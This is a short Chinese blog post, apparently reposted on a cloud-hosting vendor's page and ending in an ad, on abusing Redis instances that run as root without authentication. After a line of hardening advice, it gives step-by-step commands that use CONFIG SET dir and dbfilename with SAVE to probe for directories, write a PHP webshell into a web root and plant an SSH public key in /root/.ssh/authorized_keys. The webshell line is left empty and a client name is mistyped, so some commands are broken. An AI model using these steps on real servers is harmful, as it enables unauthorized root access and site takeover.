关于Redis的一些好玩东西-创新互联

在许多服务器上部署的Redis是采用Root权限进行启动进而可以利用这个Root做许多超级权限的事情。由于REDIS是没有严格授权管理机制大家在部署一定不要设置为0.0.0.0以及最好使用requirepass(虽然是明文但是至少增加一定的难度)。

本文主要利用的是redis提供的configsave两个命令来完成我们的HACK功能便捷的工具用歪了就成了祸害。

简单介绍几个有用的命令

config set dir $path:

这个命令是配置为了指定redis的“工作路径”之后生成的RDB和AOF文件都会存储在这里

dbfilename $name:

RDB文件名默认为“dump.rdb”

save:

将内存里的数据进行持久化操作

它们结合在一起就可以实现如下好玩的功能

1.指定文件夹是否存在

config set dir /home/bob

如果是返回(error) ERR Changing directory: No such file or directory表示没有该文件夹。

如果返回OK表示服务器上有这个文件夹并且已经将其设置为内存快照保存的文件夹

2.webshell最好使用之前进行flushdb,或者flushall清空内存里数据

1.config set dir /opt/web/www #设定网站的目录
2.config set dbfilename test.php #设定将要保存的文件名
3.set "" "" #我们的webshell
4.save  #将内存持久化到test.php

3.访问信任

1.cat ~/.ssh/id_rsa.pub > ~/foo.txt
2.cat ~/foo.txt|redis -x set hack #将foo.txt里的内容保存为一个KEY为hack的字符串
3.config set dir /root/.ssh/ #设定root的.ssh文件夹
4.config set dbfilename authorized_keys
5.save

另外有需要云服务器可以了解下创新互联scvps.cn，海内外云服务器15元起步，三天无理由+7*72小时售后在线，公司持有idc许可证，提供“云服务器、裸金属服务器、高防服务器、香港服务器、美国服务器、虚拟主机、免备案服务器”等云主机租用服务以及企业上云的综合解决方案，具有“安全稳定、简单易用、服务可用性高、性价比高”等特点与优势，专为企业上云打造定制，能够满足用户丰富、多元化的应用场景需求。